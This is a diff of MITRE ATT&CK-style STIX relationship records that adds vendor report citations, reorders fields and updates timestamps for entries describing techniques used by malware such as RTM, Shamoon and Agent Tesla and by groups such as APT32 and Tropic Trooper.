@@ -48950,22 +49978,27 @@
{
"id": "relationship--d5c86dd3-3cfa-4ade-8984-fdf079b9f81b",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[RTM](https://attack.mitre.org/software/S0148) strings, network data, configuration, and modules are encrypted with a modified RC4 algorithm.(Citation: ESET RTM Feb 2017)",
+ "description": "[RTM](https://attack.mitre.org/software/S0148) strings, network data, configuration, and modules are encrypted with a modified RC4 algorithm. [RTM](https://attack.mitre.org/software/S0148) has also been delivered to targets as various archive files including ZIP, 7-ZIP, and RAR.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ },
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
"type": "relationship",
- "modified": "2020-03-16T17:46:56.876Z",
+ "modified": "2020-06-16T20:51:13.581Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -49105,16 +50138,15 @@
],
"external_references": [
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
}
],
"source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
"relationship_type": "uses",
"target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
"type": "relationship",
- "modified": "2020-03-23T22:01:46.014Z",
+ "modified": "2020-05-14T15:14:33.555Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -49257,12 +50289,12 @@
"url": "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html"
}
],
- "source_ref": "malware--3cab1b76-2f40-4cd0-8d2c-7ed16eeb909c",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-01-16T16:13:52.465Z"
+ "created": "2018-01-16T16:13:52.465Z",
+ "source_ref": "malware--3cab1b76-2f40-4cd0-8d2c-7ed16eeb909c",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--82e1ab81-89f9-4d96-87fd-69d04c6710f3",
@@ -49341,12 +50373,12 @@
"url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html"
}
],
- "source_ref": "malware--0ced8926-914e-4c78-bc93-356fb90dbd1f",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--0ced8926-914e-4c78-bc93-356fb90dbd1f",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736"
},
{
"id": "relationship--a12a471b-39b2-4abf-80d0-af88d5a4f038",
@@ -49800,7 +50832,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "relationship",
- "modified": "2020-03-18T19:25:30.166Z",
+ "modified": "2020-05-20T13:38:06.884Z",
"created": "2019-01-29T18:44:05.087Z"
},
{
@@ -49866,27 +50898,6 @@
"modified": "2019-07-26T16:10:42.525Z",
"created": "2019-01-29T19:55:48.168Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "external_references": [
- {
- "description": "Horejsi, J., et al. (2018, March 14). Tropic Trooper\u2019s New Strategy. Retrieved November 9, 2018.",
- "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/",
- "source_name": "TrendMicro Tropic Trooper Mar 2018"
- }
- ],
- "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) can use ports 443 and 53 for C2 communications via malware called TClient.(Citation: TrendMicro Tropic Trooper Mar 2018)",
- "id": "relationship--f3a6218e-35e3-4897-9b3b-0554a51dce43",
- "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
- "type": "relationship",
- "modified": "2019-06-30T22:44:28.109Z",
- "created": "2019-01-29T20:17:49.272Z"
- },
{
"id": "relationship--bd7dce44-be74-4d8e-b9e4-efcd77b8a29b",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -49969,12 +50980,12 @@
"url": "https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/"
}
],
- "source_ref": "malware--0a9c51e0-825d-4b9b-969d-ce86ed8ce3c3",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-01-16T16:13:52.465Z"
+ "created": "2018-01-16T16:13:52.465Z",
+ "source_ref": "malware--0a9c51e0-825d-4b9b-969d-ce86ed8ce3c3",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298"
},
{
"id": "relationship--1be07482-c5ed-42f9-8be1-5dbb44152461",
@@ -50027,16 +51038,16 @@
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69",
"type": "relationship",
- "modified": "2020-03-16T17:46:56.944Z",
+ "modified": "2020-05-12T22:13:16.878Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -50170,22 +51181,27 @@
{
"id": "relationship--272068a3-47e3-42d6-8772-71d39c1976c3",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Shamoon](https://attack.mitre.org/software/S0140) obtains the victim's operating system version and keyboard layout and sends the information to the C2 server.(Citation: Palo Alto Shamoon Nov 2016)",
+ "description": "[Shamoon](https://attack.mitre.org/software/S0140) obtains the victim's operating system version and keyboard layout and sends the information to the C2 server.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "Palo Alto Shamoon Nov 2016",
+ "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/",
"description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.",
- "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/"
+ "source_name": "Palo Alto Shamoon Nov 2016"
+ },
+ {
+ "description": "Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.",
+ "url": "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/",
+ "source_name": "Unit 42 Shamoon3 2018"
}
],
"source_ref": "malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3",
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2019-04-24T23:59:16.187Z",
+ "modified": "2020-05-29T18:11:23.525Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -50602,27 +51618,6 @@
"modified": "2019-05-30T18:05:32.748Z",
"created": "2019-01-30T14:00:49.906Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "external_references": [
- {
- "description": "Cherepanov, A., Lipovsky, R. (2018, October 11). New TeleBots backdoor: First evidence linking Industroyer to NotPetya. Retrieved November 27, 2018.",
- "url": "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/",
- "source_name": "ESET TeleBots Oct 2018"
- }
- ],
- "description": "[Exaramel for Windows](https://attack.mitre.org/software/S0343) can execute GO scripts.(Citation: ESET TeleBots Oct 2018)",
- "id": "relationship--29bc6cf7-25aa-41da-8be3-e2de12c7d876",
- "source_ref": "malware--051eaca1-958f-4091-9e5f-a9acd8f820b5",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
- "type": "relationship",
- "modified": "2020-03-20T17:11:15.231Z",
- "created": "2019-01-30T15:10:04.213Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -50832,27 +51827,6 @@
"modified": "2019-07-26T18:47:18.860Z",
"created": "2019-01-31T00:36:40.962Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "external_references": [
- {
- "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
- "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
- "source_name": "Cybereason Cobalt Kitty 2017"
- }
- ],
- "description": "[APT32](https://attack.mitre.org/groups/G0050) enumerated administrative users and DC servers using the commands net localgroup administrators and net group \"Domain Controllers\" /domain.(Citation: Cybereason Cobalt Kitty 2017)",
- "id": "relationship--eabc867b-7383-4752-b3ec-ad51ec8104bb",
- "source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af",
- "type": "relationship",
- "modified": "2020-03-18T19:33:54.728Z",
- "created": "2019-01-31T01:07:58.606Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -51275,22 +52249,27 @@
{
"id": "relationship--4e9c5234-65e9-4b4a-bc13-891e7aed84b2",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Shamoon](https://attack.mitre.org/software/S0140) creates a new service named \u201cntssrv\u201d to execute the payload.(Citation: Palo Alto Shamoon Nov 2016)",
+ "description": "[Shamoon](https://attack.mitre.org/software/S0140) creates a new service named \u201cntssrv\u201d to execute the payload. Newer versions create the \"MaintenaceSrv\" and \"hdv_725x\" services.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "Palo Alto Shamoon Nov 2016",
+ "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/",
"description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.",
- "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/"
+ "source_name": "Palo Alto Shamoon Nov 2016"
+ },
+ {
+ "description": "Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.",
+ "url": "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/",
+ "source_name": "Unit 42 Shamoon3 2018"
}
],
"source_ref": "malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3",
"relationship_type": "uses",
"target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
"type": "relationship",
- "modified": "2019-04-24T23:59:16.229Z",
+ "modified": "2020-05-29T18:11:23.520Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -51352,12 +52331,12 @@
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "source_ref": "tool--294e2560-bd48-44b2-9da2-833b5588ad11",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--294e2560-bd48-44b2-9da2-833b5588ad11",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0"
},
{
"id": "relationship--e58abef6-2089-4f55-b5ee-9fc24378b52f",
@@ -51566,22 +52545,27 @@
{
"id": "relationship--1e03e95c-1c9a-4fa8-9d6d-b5d244b06509",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[RTM](https://attack.mitre.org/software/S0148) collects data from the clipboard.(Citation: ESET RTM Feb 2017)",
+ "description": "[RTM](https://attack.mitre.org/software/S0148) collects data from the clipboard.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ },
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f",
"type": "relationship",
- "modified": "2020-03-16T17:46:56.928Z",
+ "modified": "2020-06-16T20:51:13.652Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -51823,12 +52807,12 @@
"url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"
}
],
- "source_ref": "tool--a52edc76-328d-4596-85e7-d56ef5a9eb69",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--e624264c-033a-424d-9fd7-fc9c3bbdb03e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--a52edc76-328d-4596-85e7-d56ef5a9eb69",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--e624264c-033a-424d-9fd7-fc9c3bbdb03e"
},
{
"id": "relationship--4f2fb45a-8359-4c75-93ae-095fcf9f856e",
@@ -51909,35 +52893,40 @@
{
"source_name": "Kaspersky Regin",
"description": "Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.",
- "url": "https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
+ "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
}
],
"source_ref": "malware--4c59cce8-cb48-4141-b9f1-f646edfaadb0",
"relationship_type": "uses",
"target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
"type": "relationship",
- "modified": "2020-03-16T17:37:15.671Z",
+ "modified": "2020-06-29T01:54:53.318Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
"id": "relationship--45f9e4b6-a6a0-4f9f-aae9-9e8a69f5681d",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[RTM](https://attack.mitre.org/software/S0148) can obtain a list of smart card readers attached to the victim.(Citation: ESET RTM Feb 2017)",
+ "description": "[RTM](https://attack.mitre.org/software/S0148) can obtain a list of smart card readers attached to the victim.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ },
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643",
"type": "relationship",
- "modified": "2020-03-16T17:46:56.988Z",
+ "modified": "2020-06-16T20:51:13.669Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -51975,12 +52964,12 @@
"url": "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/"
}
],
- "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--c848fcf7-6b62-4bde-8216-b6c157d48da0",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--c848fcf7-6b62-4bde-8216-b6c157d48da0"
},
{
"id": "relationship--f02f0a58-a76b-4966-8717-8a9b40b07e81",
@@ -52289,12 +53278,12 @@
"url": "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/"
}
],
- "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5"
},
{
"id": "relationship--a0c8ed8f-8c17-4ab1-b403-f1cfd314d3da",
@@ -52371,28 +53360,33 @@
],
"external_references": [
{
- "source_name": "Talos Agent Tesla Oct 2018",
+ "description": "Brumaghin, E., et al. (2018, October 15). Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox. Retrieved November 5, 2018.",
"url": "https://blog.talosintelligence.com/2018/10/old-dog-new-tricks-analysing-new-rtf_15.html",
- "description": "Brumaghin, E., et al. (2018, October 15). Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox. Retrieved November 5, 2018."
+ "source_name": "Talos Agent Tesla Oct 2018"
},
{
- "source_name": "Fortinet Agent Tesla April 2018",
+ "description": "Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware Variant. Retrieved November 5, 2018.",
"url": "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html",
- "description": "Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware Variant. Retrieved November 5, 2018."
+ "source_name": "Fortinet Agent Tesla April 2018"
},
{
"source_name": "Fortinet Agent Tesla June 2017",
"url": "https://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html",
"description": "Zhang, X. (2017, June 28). In-Depth Analysis of A New Variant of .NET Malware AgentTesla. Retrieved November 5, 2018."
+ },
+ {
+ "source_name": "Bitdefender Agent Tesla April 2020",
+ "url": "https://labs.bitdefender.com/2020/04/oil-gas-spearphishing-campaigns-drop-agent-tesla-spyware-in-advance-of-historic-opec-deal/",
+ "description": "Arsene, L. (2020, April 21). Oil & Gas Spearphishing Campaigns Drop Agent Tesla Spyware in Advance of Historic OPEC+ Deal. Retrieved May 19, 2020."
}
],
- "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) can steal data from the victim\u2019s clipboard.(Citation: Talos Agent Tesla Oct 2018)(Citation: Fortinet Agent Tesla April 2018)(Citation: Fortinet Agent Tesla June 2017)",
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) can steal data from the victim\u2019s clipboard.(Citation: Talos Agent Tesla Oct 2018)(Citation: Fortinet Agent Tesla April 2018)(Citation: Fortinet Agent Tesla June 2017)(Citation: Bitdefender Agent Tesla April 2020)",
"id": "relationship--06dded4b-f28c-45d3-8dc6-097a9a4a3cd6",
"source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
"relationship_type": "uses",
"target_ref": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f",
"type": "relationship",
- "modified": "2019-04-16T14:30:35.274Z",
+ "modified": "2020-05-20T13:38:06.936Z",
"created": "2019-01-29T18:44:05.069Z"
},
{
@@ -52494,15 +53488,20 @@
"description": "Ray, V. (2016, November 22). Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy. Retrieved November 9, 2018.",
"url": "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/",
"source_name": "Unit 42 Tropic Trooper Nov 2016"
+ },
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
}
],
- "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) used shellcode with an XOR algorithm to decrypt a payload.(Citation: Unit 42 Tropic Trooper Nov 2016)",
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) used shellcode with an XOR algorithm to decrypt a payload. [Tropic Trooper](https://attack.mitre.org/groups/G0081) also decrypted image files which contained a payload.(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro Tropic Trooper May 2020)",
"id": "relationship--d68120b8-9ef8-4a40-ae4c-d2b597336140",
"source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
"relationship_type": "uses",
"target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
"type": "relationship",
- "modified": "2019-06-30T22:44:28.129Z",
+ "modified": "2020-05-21T12:59:00.542Z",
"created": "2019-01-29T20:17:49.301Z"
},
{
@@ -53062,13 +54061,13 @@
"source_name": "Cybereason Cobalt Kitty 2017"
}
],
- "description": "[APT32](https://attack.mitre.org/groups/G0050) used NTFS alternate data stream to hide their payloads.(Citation: Cybereason Cobalt Kitty 2017)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) used NTFS alternate data streams to hide their payloads.(Citation: Cybereason Cobalt Kitty 2017)",
"id": "relationship--1eeb08cb-8b06-45a7-bf74-fb8bdaa4b02f",
"source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
"relationship_type": "uses",
"target_ref": "attack-pattern--f2857333-11d4-45bf-b064-2c28d8525be5",
"type": "relationship",
- "modified": "2019-07-17T13:11:37.867Z",
+ "modified": "2020-06-24T03:16:06.453Z",
"created": "2019-01-31T01:07:58.592Z"
},
{
@@ -53200,12 +54199,12 @@
"url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf"
}
],
- "source_ref": "malware--49abab73-3c5c-476e-afd5-69b5c732d845",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--49abab73-3c5c-476e-afd5-69b5c732d845",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830"
},
{
"id": "relationship--ed2c177c-18fc-4bfd-9169-48af1557a542",
@@ -53288,7 +54287,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
- "modified": "2018-10-17T00:14:20.652Z",
+ "modified": "2020-06-23T20:40:40.939Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -53326,12 +54325,12 @@
"url": "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/"
}
],
- "source_ref": "malware--e3cedcfe-6515-4348-af65-7f2c4157bf0d",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--e3cedcfe-6515-4348-af65-7f2c4157bf0d",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--3cd0e385-3c60-4742-b3a6-c07dbf10ba45",
@@ -53582,12 +54581,12 @@
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "source_ref": "malware--310f437b-29e7-4844-848c-7220868d074a",
- "relationship_type": "revoked-by",
- "target_ref": "malware--b42378e0-f147-496f-992a-26a49705395b",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--310f437b-29e7-4844-848c-7220868d074a",
+ "relationship_type": "revoked-by",
+ "target_ref": "malware--b42378e0-f147-496f-992a-26a49705395b"
},
{
"id": "relationship--b9e2fac9-fc1a-4e13-ac68-1a5796b04d72",
@@ -53807,12 +54806,12 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-3445-99"
}
],
- "source_ref": "malware--c251e4a5-9a2e-4166-8e42-442af75c3b9a",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--c251e4a5-9a2e-4166-8e42-442af75c3b9a",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082"
},
{
"id": "relationship--def89c4a-b394-4137-8a96-c794780352f2",
@@ -54312,12 +55311,12 @@
"url": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html"
}
],
- "source_ref": "malware--98e8a977-3416-43aa-87fa-33e287e9c14c",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896",
